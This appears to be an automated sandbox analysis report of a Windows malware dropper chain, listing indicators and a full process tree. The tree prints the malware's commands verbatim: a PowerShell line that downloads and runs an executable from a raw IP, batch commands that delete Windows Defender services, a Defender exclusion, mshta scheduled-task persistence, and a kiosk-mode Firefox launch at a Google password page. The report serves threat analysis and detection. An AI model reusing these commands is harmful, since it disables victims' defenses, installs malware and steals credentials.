pid Process 652 Process not Found 652 Process not Found 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe 10556 923a15a9.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2928 f73ae_003.exe 2928 f73ae_003.exe 2928 f73ae_003.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
description pid Process Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 7344 powershell.exe Token: SeDebugPrivilege 7672 powershell.exe Token: SeDebugPrivilege 7900 powershell.exe Token: SeDebugPrivilege 5784 powershell.exe Token: SeDebugPrivilege 10556 923a15a9.exe Token: SeBackupPrivilege 10556 923a15a9.exe Token: SeRestorePrivilege 10556 923a15a9.exe Token: SeLoadDriverPrivilege 10556 923a15a9.exe Token: SeShutdownPrivilege 10556 923a15a9.exe Token: SeSystemEnvironmentPrivilege 10556 923a15a9.exe Token: SeSecurityPrivilege 10556 923a15a9.exe Token: SeDebugPrivilege 11556 taskkill.exe Token: SeBackupPrivilege 10556 923a15a9.exe Token: SeRestorePrivilege 10556 923a15a9.exe Token: SeDebugPrivilege 10556 923a15a9.exe Token: SeSystemEnvironmentPrivilege 10556 923a15a9.exe Token: SeSecurityPrivilege 10556 923a15a9.exe Token: SeCreatePermanentPrivilege 10556 923a15a9.exe Token: SeShutdownPrivilege 10556 923a15a9.exe Token: SeLoadDriverPrivilege 10556 923a15a9.exe Token: SeIncreaseQuotaPrivilege 10556 923a15a9.exe Token: SeSecurityPrivilege 10556 923a15a9.exe Token: SeSystemProfilePrivilege 10556 923a15a9.exe Token: SeDebugPrivilege 10556 923a15a9.exe Token: SeMachineAccountPrivilege 10556 923a15a9.exe Token: SeCreateTokenPrivilege 10556 923a15a9.exe Token: SeAssignPrimaryTokenPrivilege 10556 923a15a9.exe Token: SeTcbPrivilege 10556 923a15a9.exe Token: SeAuditPrivilege 10556 923a15a9.exe Token: SeSystemEnvironmentPrivilege 10556 923a15a9.exe Token: SeLoadDriverPrivilege 10556 923a15a9.exe Token: SeLoadDriverPrivilege 10556 923a15a9.exe Token: SeIncreaseQuotaPrivilege 10556 923a15a9.exe Token: SeSecurityPrivilege 10556 923a15a9.exe Token: SeSystemProfilePrivilege 10556 923a15a9.exe Token: SeDebugPrivilege 10556 923a15a9.exe Token: SeMachineAccountPrivilege 10556 923a15a9.exe Token: SeCreateTokenPrivilege 10556 923a15a9.exe Token: SeAssignPrimaryTokenPrivilege 10556 923a15a9.exe Token: SeTcbPrivilege 10556 923a15a9.exe Token: SeAuditPrivilege 10556 923a15a9.exe Token: SeSystemEnvironmentPrivilege 10556 923a15a9.exe Token: SeDebugPrivilege 12980 taskkill.exe Token: SeDebugPrivilege 7136 taskkill.exe Token: SeDebugPrivilege 1832 taskkill.exe Token: SeDebugPrivilege 7368 taskkill.exe Token: SeDebugPrivilege 8812 firefox.exe Token: SeDebugPrivilege 8812 firefox.exe Token: SeDebugPrivilege 8156 1072de6716.exe -
Suspicious use of FindShellTrayWindow 30 IoCs
pid Process 5608 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 8812 firefox.exe 6276 6a162b453f.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 6276 6a162b453f.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 6276 6a162b453f.exe 8812 firefox.exe -
Suspicious use of SendNotifyMessage 23 IoCs
pid Process 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 6276 6a162b453f.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 6276 6a162b453f.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 8812 firefox.exe 6276 6a162b453f.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 8812 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5608 wrote to memory of 1904 5608 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 90 PID 5608 wrote to memory of 1904 5608 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 90 PID 5608 wrote to memory of 1904 5608 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 90 PID 1904 wrote to memory of 2960 1904 rapes.exe 96 PID 1904 wrote to memory of 2960 1904 rapes.exe 96 PID 1904 wrote to memory of 2960 1904 rapes.exe 96 PID 2960 wrote to memory of 3964 2960 apple.exe 97 PID 2960 wrote to memory of 3964 2960 apple.exe 97 PID 2960 wrote to memory of 3964 2960 apple.exe 97 PID 3964 wrote to memory of 5436 3964 11.exe 99 PID 3964 wrote to memory of 5436 3964 11.exe 99 PID 5436 wrote to memory of 1624 5436 cmd.exe 101 PID 5436 wrote to memory of 1624 5436 cmd.exe 101 PID 5436 wrote to memory of 1624 5436 cmd.exe 101 PID 1624 wrote to memory of 4388 1624 11.exe 102 PID 1624 wrote to memory of 4388 1624 11.exe 102 PID 4388 wrote to memory of 5524 4388 cmd.exe 104 PID 4388 wrote to memory of 5524 4388 cmd.exe 104 PID 4388 wrote to memory of 1996 4388 cmd.exe 105 PID 4388 wrote to memory of 1996 4388 cmd.exe 105 PID 4388 wrote to memory of 1132 4388 cmd.exe 106 PID 4388 wrote to memory of 1132 4388 cmd.exe 106 PID 4388 wrote to memory of 428 4388 cmd.exe 108 PID 4388 wrote to memory of 428 4388 cmd.exe 108 PID 4388 wrote to memory of 1064 4388 cmd.exe 109 PID 4388 wrote to memory of 1064 4388 cmd.exe 109 PID 4388 wrote to memory of 4112 4388 cmd.exe 110 PID 4388 wrote to memory of 4112 4388 cmd.exe 110 PID 4388 wrote to memory of 392 4388 cmd.exe 111 PID 4388 wrote to memory of 392 4388 cmd.exe 111 PID 4388 wrote to memory of 4040 4388 cmd.exe 112 PID 4388 wrote to memory of 4040 4388 cmd.exe 112 PID 4388 wrote to memory of 624 4388 cmd.exe 113 PID 4388 wrote to memory of 624 4388 cmd.exe 113 PID 4388 wrote to memory of 1652 4388 cmd.exe 114 PID 4388 wrote to memory of 1652 4388 cmd.exe 114 PID 4388 wrote to memory of 2248 4388 cmd.exe 115 PID 4388 wrote to memory of 2248 4388 cmd.exe 115 PID 4388 wrote to memory of 2464 4388 cmd.exe 116 PID 4388 wrote to memory of 2464 4388 cmd.exe 116 PID 4388 wrote to memory of 4936 4388 cmd.exe 117 PID 4388 wrote to memory of 4936 4388 cmd.exe 117 PID 4388 wrote to memory of 5100 4388 cmd.exe 118 PID 4388 wrote to memory of 5100 4388 cmd.exe 118 PID 4388 wrote to memory of 4580 4388 cmd.exe 119 PID 4388 wrote to memory of 4580 4388 cmd.exe 119 PID 4388 wrote to memory of 5272 4388 cmd.exe 120 PID 4388 wrote to memory of 5272 4388 cmd.exe 120 PID 4388 wrote to memory of 4200 4388 cmd.exe 121 PID 4388 wrote to memory of 4200 4388 cmd.exe 121 PID 4388 wrote to memory of 3548 4388 cmd.exe 122 PID 4388 wrote to memory of 3548 4388 cmd.exe 122 PID 4388 wrote to memory of 432 4388 cmd.exe 123 PID 4388 wrote to memory of 432 4388 cmd.exe 123 PID 4388 wrote to memory of 2536 4388 cmd.exe 124 PID 4388 wrote to memory of 2536 4388 cmd.exe 124 PID 4388 wrote to memory of 5344 4388 cmd.exe 125 PID 4388 wrote to memory of 5344 4388 cmd.exe 125 PID 4388 wrote to memory of 5460 4388 cmd.exe 126 PID 4388 wrote to memory of 5460 4388 cmd.exe 126 PID 4388 wrote to memory of 3916 4388 cmd.exe 127 PID 4388 wrote to memory of 3916 4388 cmd.exe 127 PID 4388 wrote to memory of 1492 4388 cmd.exe 128 PID 4388 wrote to memory of 1492 4388 cmd.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe"C:\Users\Admin\AppData\Local\Temp\61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5608 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\926C.tmp\926D.tmp\926E.bat C:\Users\Admin\AppData\Local\Temp\11.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:5436 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9402.tmp\9403.tmp\9404.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"7⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:5524
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:1996
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:1132
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:428
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:1064
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4112
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:392
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:4040
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:624
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:1652
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:2248
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:2464
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:4936
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:5100
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:4580
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:5272
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:4200
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:3548
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:432
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:2536
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:5344
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:5460
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:3916
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:1492
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:3620
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:2128
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:756
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:1488
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:856
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:928
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:2624
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:5920
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:5828
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:6124
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:1468
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:4620
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:3580
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:3536
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:3056
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:3600
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:4280
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:4380
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:5588
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:376
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:5420
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:3012
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:5388
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:904
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:4904
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:5416
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:5712
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:5196
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:3272
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:5268
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:4520
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:1708
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:2240
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:4092
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:6020
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:2996
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:2192
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2928 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵PID:3132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:5384 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵
- Executes dropped EXE
PID:2244
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵
- Deletes itself
- Executes dropped EXE
PID:3584 -
C:\Users\Admin\AppData\Local\Temp\{211963d6-b0d3-4cab-90f0-b5ce54eefe0c}\44ae5ee5.exe"C:\Users\Admin\AppData\Local\Temp\{211963d6-b0d3-4cab-90f0-b5ce54eefe0c}\44ae5ee5.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot6⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:9384 -
C:\Users\Admin\AppData\Local\Temp\{cdfce00f-9db3-471f-b4d9-5817cd23d4aa}\923a15a9.exeC:/Users/Admin/AppData/Local/Temp/{cdfce00f-9db3-471f-b4d9-5817cd23d4aa}/\923a15a9.exe -accepteula -adinsilent -silent -processlevel 2 -postboot7⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:10556
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1160 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
- System Location Discovery: System Language Discovery
PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10338050121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:4448 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:7304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:7656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:7876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7900
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "kHWKwmazc06" /tr "mshta \"C:\Temp\ZN1OPuE5k.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:8140
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\ZN1OPuE5k.hta"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5784 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:8524
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338160101\73998ddf32.exe"C:\Users\Admin\AppData\Local\Temp\10338160101\73998ddf32.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4512 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2600
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338170101\64145b6cb6.exe"C:\Users\Admin\AppData\Local\Temp\10338170101\64145b6cb6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3692
-
-
C:\Users\Admin\AppData\Local\Temp\10338180101\1ced906bca.exe"C:\Users\Admin\AppData\Local\Temp\10338180101\1ced906bca.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:9516
-
-
C:\Users\Admin\AppData\Local\Temp\10338190101\6a162b453f.exe"C:\Users\Admin\AppData\Local\Temp\10338190101\6a162b453f.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6276 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:11556
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7136
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7368
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:8784
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:8812 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {ed11dde3-f8c1-4521-9fd9-8eab04523e3b} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu6⤵PID:6292
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {24d86670-7e1d-4893-80e9-5986b957f1cb} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket6⤵PID:1968
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3704 -prefsLen 25164 -prefMapHandle 3708 -prefMapSize 270279 -jsInitHandle 3712 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3720 -initialChannelId {a96dae30-52da-47a5-8103-296135d0bccc} -parentPid 8812 -crashReporter "\\.\pipe\gecko-crash-server-pipe.8812" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab6⤵
- Checks processor information in registry
PID:8108
-
-
